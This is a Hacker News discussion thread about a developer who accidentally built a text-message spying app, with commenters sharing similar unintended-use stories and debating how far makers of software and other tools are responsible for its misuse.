Hacker News new | past | comments | ask | show | jobs | submit login
I accidentally built a spying app (withblue.ink)
176 points by akeck on Dec 5, 2020 | hide | past | favorite | 60 comments



One time a friend and I built an app for a weekend hackathon competition called Rails Rumble.

At the time (2010), link shortening services were all the rage, but they were being used to obfuscate malware links. To fight this, we wanted to create a link shortening service that couldn't be used for malware. Instead of redirecting to a webpage, it broke the page apart into its core elements so you could see what it was about before you visited it. If the site had photos, we even put them into a nice looking image gallery that you could peruse.

We finished the project in 72 hours and got an honorable mention for the competition, but we didn't win. A month later, our free server hosting we were given for the competition was about to expire. I logged in to spin the whole thing down.

Poking around the DB a bit, I realized our little weekend project had thousands of links shortened and the traffic for the site was actually exceeding the limits of the server. Looking at the URLs, I realized they all had one thing in common; they were all porn sites. The simple inclusion of the image gallery had inadvertently created a porn scraping service. It was like your browser's reader view, but perfect for adult sites!

It was so obvious in retrospect, but sometimes in your rush to build an idea, you can be completely blind to its true nature. This time it was amusing, but the next time it could be dangerous, and the lesson always stuck with me.


We just wanted to build a gif-making app for a hackathon.

You could search for and browse movies by clicking on directors, actors and other staff, download a movie with one click, preview it to select what you want to clip, and make a gif out of it.

Turns out it was a very convenient interface to discover, download, and view movies. All we had to do was front-end to TMDb, a torrent search scrapper, and a layer between the Transmission CLI and the front-end.

We inadvertently built a popcorn-time clone in a day.


Reminds me of Firefox Send.

Found myself in a situation needing it a few weeks ago and was like, ugh, what do I do now.


I swear Mozilla misses out on a ton of opportunities to make money and fund MDN / Firefox properly. They need to stop making free services, and charge money for services that will fund the open source projects in their foundation, that or finally donate it to a real org that will actually maintain the projects in question.


Firefox Send had a known malware problem for awhile but when it was used to successfully target a NGO the pressure forced Mozilla to pull the plug. At least that’s the version that’s publicly available.

If Firefox had used something other than firefox.com the brand trust could be decoupled from the service but by offering it for free they received PR. Catch 22 I think.

The nature of Mozilla not having access to the files eliminated any sort of scanning/vetting and malicious actors quickly exploited it.

If Firefox had decided to charge for send I’m sure fraudulent payments would have been used to procure accounts intended for malware. That could have helped expire out malicious links before unsuspecting users clicked them but it wouldn’t have completely addressed the issue.


I think paras 2&3 were also the curse: firefox.com was a “good neighbourhood”, which made it convenient/accessible, but that’s good for the whole spectrum of actors.

I guess this is why most no-account file hosting is on sketchy sites.


There's still a working donation-supported command-line-focused version of it here [1] for anyone who doesn't know!

[1] https://github.com/timvisee/ffsend


Thanks for linking ffsend! You can also use it in your browser, like Send, at `send.vis.ee`.

ffsend uses this host, but I don't widely advertise it's address to prevent overloading the server with spam.


The year is 2020 and transferring files between devices is still hard.

I think a decade ago I started paying ~5$ a month for a server at OVH with a lot of storage. SSH/Filezilla, Nginx on an obfuscated URL, has solved a lot of my problems. I also use it as a server to test docker images, a VPN when I want a French IP, a pictures backup server and a professional presentation website.

My free email account I am using since the 90s is now telling me it is almost full so I am considering to switch it.

Really, storage is cheap but is not free. Save yourself a lot of hassle: pay it yourself, take back control.


I am working on a pet project, which is an application that would allow people to share files for limited time with short urls.

Do you think that would be useful to many people?


Did you ever open source the project? I can see it being useful in a more limited context.



Thinking “how can this technology be used by stalkers, harassers, abusive partners” and so forth is something I didn’t think about when I was young, but always consider now.

Having more diverse voices in your team and in your life is a big part of getting better at this stuff.


What are some things a start up founder can do to foster a culture of diversity and inclusivety?


Focus on diversity of perspective as opposed to superficial diversity. For example, a second generation Taiwanese American can bring a very different perspective from that of a Taiwanese immigrant. The latter is more likely to bring something unique to the table.


Fully agree. Deep diversity is better than superficial diversity.

But if you’re starting from a position with almost no diversity even seemingly “superficial” measures can help you move forward. You can’t turn around and tick a box and say “well that’s diversity taken care of!” But it’s a step on the journey.

(And the journey isn’t “being diverse” it’s “making good things that aren’t accidentally riddled with blind sides”)


i just wanted to save this here. good point.


Fortunately, HN has a feature to allow you to do that without polluting threads with useless comments: just click on the "timestamp" of the comment (next to the username) and then click on "favorite".

In the future, you can view all of your "favorite" comments from your profile page (click on your username in the top-rigtht of the page). As an added bonus, it's much easier than having to sift through your own comments to find that one specific thread you're looking for.


Also, browsers have bookmark features.


Hire outside your bubble. Hire someone from non-elite schools who have amazing/interesting projects or clear success in spite of struggles or poor odds.


Make sure to include diversity of opinion in your hiring criteria so as to avoid creating a bubble. This is true diversity as opposed to identity-based "diversity". Make sure to get people who themselves are open for true diversity as well, otherwise you risk creating factions inside your company.


Favor people that don't fit your mold. Hang out with people that aren't your usual group. Hang out in an underground community (not literally underground, more like subcultures)


So far it looks like "Don't Hire Who Drinks Your Kool-Aid".

Kool-Aid is good for some of your group.

The opposite is also good for your group.


In the last 25 years I've experienced the voyage from a staff count of 6 to a staff count of 100 three times in different companies (service provider, professional services, software editor).

Your first hires determine largely your culture. The people that end up creating teams, and that eventually hire and influence people themselves, make your culture.


Perhaps care less about “culture fit” in hiring? If you only hire people who think the way you do, the results are obviously not diverse.


> I implemented a new feature: the ability to upload texts automatically, in background, without user intervention.

> I had, unknowingly and unwillingly, built a spying tool, and a really convenient and efficient one.

> Thanks to background uploads, people could install the YouArchive.It app on another person’s iPhone, set it up, maybe even hide it (something possible on a jailbroken iPhone), and then watch as the text messages come in, almost real-time. Jealous partners, stalkers and the likes could install this tool on an unknowing victim’s phone with relative ease.

...

This hit home: (The absolutely otherwise fantastic) NextDNS (and anything that's similar to it) comes pretty close to a spying app, too (300,000 DNS requests per month conveniently stored for a long time, for free). I know a handful people who I introduced NextDNS to as a privacy enhancing service ended up using it to encroach upon privacy by configuring it on unsuspecting user's Android and iPhones (doesn't even require jailbreak or root and runs forever in the "background").


You can run people over with cars, electrocute them with electricity. This doesn't mean we should never have built cars or generators.

The more powerful and impactful something is, the greater the potential for abuse. You don't even need that something to be abused - bad people benefited from electricity just as much as good people. This doesn't mean we should stop building powerful and impactful things, or think of ways to restrict them such that only the "good guys" can benefit.


Both cars and electrical infrastructure have a ton of safety mechanisms built in to them to reduce the potential for harm, many required by law.

For cars we have seatbelts, airbags, traffic lights, speed limits, guard rails on mountain roads, and you have to undergo training or certification before you're allowed to get a license. All cars have numberplates for tracking, and identifying these in CCTV and dashcam footage can be useful in identifying those who have caused accidents or other damage. Vehicle manufactures have a lot of regulations that they have to comply with.

For electrical distribution networks and equipment there are also many safety mechanisms in place, such as insulation, circuit breakers, surge protectors, and lots of regulations covering the installation of electrical wiring in buildings. While growing up, everyone learns of the potential dangers of electricity, e.g. don't stick a fork in a socket and keep that hairdryer away from the bath tub. Similarly everyone knows the damage and trauma that can result from car accidents.

The same is not currently true of social media. I don't know what the right answer is regarding regulation - I'm wary of unforseen negative consequences it may have and the potential for it to be poorly thought out. But I think education on how to use social media responsibly is important. Things like be careful about how much information you share about yourself, don't believe everything you read (check to see if the source of news is reliable), learn how to identify fake news and propaganda, and even how to decide whether to opt out of using certain services altogether.

I agree with your main argument, but it's overly simplistic - we should think about how to achieve the benefits of new technologies while minimising the costs.


All of these safety measures are developed through trials and iterative improvements, not something that was foreseen by the inventors. That's because its difficult if not impossible to accurately predict the impact of a revolutionary product at the onset. Its hard enough predicting whether something will be revolutionary, much less its impact.

This iterative process is working fine for social media. The platforms are changing, how the users use them is changing, it just needs more time to mature.


You absolutely should think about the ways the things you create can be used to harm other people, and take steps to mitigate that.


I agree, the authors of cron and wget/curl should have taken steps to protect people from having their privacy invaded by others who use these tools.


I don't really understand why three separate people have decided to attack the exact same strawman of my argument. Read my response to the other person's?


Attack? I said that I agree.


In guessing this is sarcasm given these tools predate modern social networks and serve such a fundamental feature as "Save Page" within browsers already.


cron doesn't do that. As for curl/wget, both can be used to do all kinds of things other than just "Save Page". Consider combining cron and curl to upload a file to a server every hour, or to download and execute some sort of backdoor script. Whether they predate modern social networks or not is irrelevant.


[flagged]


I mean, I do own a rubber mallet - it's quite good for what it does!

But, no, I would buy a tool that fits my purpose. If my purpose is to hit a baseball, or hammer in a nail, I'd buy a real bat, or a real hammer, because that's the purpose of the tool.

If my goal was to swing it at a friend, though, I'd probably go for the foam bat. Just like, if my purpose was to build a piece of software to archive emails, I would build it so as that it is clearly its purpose, and it would be engineered in a way to make it challenging if not impossible to be used to secretly abscond with someone else's conversations.

You seem to be interpreting my response as "people shouldn't build tools that can be used for dangerous purposes", when instead I am saying, "you should understand, and take steps to ensure, that the tools you create are used for their intended purpose." Hopefully that purpose isn't spying on people, but if it is, be up-front about it!


> and it would be engineered in a way to make it challenging if not impossible to be used to secretly abscond with someone else's conversations.

... Thereby ensuring that it is more difficult or inconvenient for legitimate users (access prompts and notifications are cheap, not free). It's a potentially legitimate tradeoff, but it is a trade; the question is whether it's closer to enforcing sane password requirements online (probably necessary), or aliasing rm to rm -i (helpful right up until you actually need to delete 300 files at once).


No, but if I were a bat designer, I would be hesitant to sell a baseball bat full of nails under the guise of "meat tenderizer". Even though it may actual work as intended (tenderizing steaks), the way it is most likely to actually be used the majority of the time so obviously overshadows it that the product probably shouldn't be created, let alone sold.


We put age restriction labels on toys and require licenses to drive a car.


There is no licensing requirement what-so-ever to drive on private property, nor any form of registration required.

As for "age-restriction" labels, they are merely at the parents' discretion. I don't think a toy store would ask for ID and refuse a sell if age indications were not met.


I would prefer my knives have sharp points on them, despite the fact that they can be used to stab. I do not want general purpose tools "mitigated" because some people could use them to harm other people.

I want my tools to be sharp, pointy, and effective.

Blunt your own tools, but don't tell me what I can do with mine, please.


>You can run people over with cars, electrocute them with electricity. This doesn't mean we should never have built cars or generators.

You should still think about how a car or a generator could hurt someone when you're building one, right? That's how we got crosswalks and fuses.


Electricity is definitely good, but cars certainly have alternatives with various tradeoffs.

Electricity is also especially amusing in the US because we picked the frequency of AC current that requires the least juice to stop your heart. Other countries picked slightly different frequencies....


Facebook can tune the algorithm to stop polarizing viewpoints. YouTube can better vet the video content that gets posted, (they find porn with eerie accuracy, but can’t identify anything else that might not be good to spread?). Instagram can promote positivity about all parts of life instead of idolization of beauty and riches. Twitter can ban someone who constantly breaks the terms of service, instead of making them a specific loophole.

None of these platforms are going to improve though. The money that they make is now closely entwined with what started out as unintended consequences and those consequences are well known. And that just makes them intended consequences.

The author shut their service down when they realized the harm it was doing. They could have solved it other ways as well. Social media and other companies could fix their unintended consequences too, but aren’t likely to so long as money and engagement are the primary metrics of success of a business.


There is an interesting ethics discussion here, because FB could, for example, tune their algorithms to avoid polarization by presenting users with extreme views content that wouldn't validade those views, but show them a more moderate view and bring them to a more moderate, fact based, scientifically sound and politically correct view. But would it be ethical? Who would be the one to choose what "the correct view" is? Right now FB is doing harm because it is being somewhat fair by showing people what "they want to see", so their behaviors are telling the algorithms want they want, not a third party, even if what they want is wrong/toxic.


Academic studies in this area would help. I'm curious why we don't see more of them.


This is almost like "think of the children" in regards to enabling users to do stuff with their own phone.

Yes, if you know how to jailbreak an iPhone and are able to have the other person use the phone, you can spy on them. You are already "on the other side of the airtight hatch". I don't think there are technical solutions to having physical control of a person and their phone.

Many times tech people want to imaging a perfect tech solution to a problem, but many times you need legal and social solutions.


I don't see how this is "think of the children"? The point is that we need to be cognizant of how the things we build can be (ab)used.


It’s this thinking about how things can be abused that is behind calls to ban encryption or for ISPs to be filtered, or for Torrents to be banned.

Every powerful tool can be abused. In fact, the more powerful it is, the more it can be abused. The abuse of the tool is the responsibility of the person abusing it.

We don’t require baseball bat or hammer manufacturers to think about how their product can be abused, even though baseball bats and hammers have been used to murder people before.


> It’s this thinking about how things can be abused that is behind calls to ban encryption or for ISPs to be filtered, or for Torrents to be banned.

You skipped the slippery slope and went straight to the scariest outcome. That isn't healthy.

https://en.m.wikipedia.org/wiki/Splitting_(psychology)


You said "many times you need legal or social solutions", but now you're dismissing legal and social solutions.

Most people on here will agree that banning encryption is going too far. But it's ridiculous to use the worst-case solution as a pretext to avoid even thinking about the problem.


Maybe they're just saying that "think of the possible uses" needs to be applied to itself -- "think of the possible uses of claiming to think of the possible uses."


> Most people on here will agree that banning encryption is going too far.

Are we talking about the same people, many among us here, who don't have any problem manipulating content to fit their view and banning Free Speech ? It's a tad of an hypocrite argument...

You are placing an almost legal liability on engineer to ensure the tool is gonna be only used to fit their definition of "good" which is a problem in itself.

Gun makers are not responsible for mass shootings. The ill-intended shooters are the only one responsible for their actions.


You're saying it's a problem to ask engineers to make sure their tools will only be used for their definition of "good". But you also imply that tools should uphold "Free Speech", which is exactly that — fitting someone's definition of "good". So which is it?


Is someone saying tools shouldn’t be made? It’s good for engineers to think about how tools they make could be abused to mitigate damage.

In a case like this, the developer could have added some periodic notification to the device or require the device user to rotate a code or reauth with the service periodically to limit abuse.

Can you think of a modification like that you could implement on a baseball bat? Of course not. Is merely a straw man.


I'm not so sure I like where the rest of this argument is going, but I do want to support the idea that there are probably a zillion ways to spy on and otherwise abuse somebody if you can get them to use an iphone that you jailbroke and installed some off-app-store software on.

Maybe it's better to come up with some lesser way to discourage people from using this kind of software on somebody else's phone without their knowledge than shutting down the whole service entirely.


At least you got in early on those PLTR stock options


and to this day you can't export your imessages in any official way.


well, stop doing that.


You could’ve made the same point in a post 1/10 the length.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: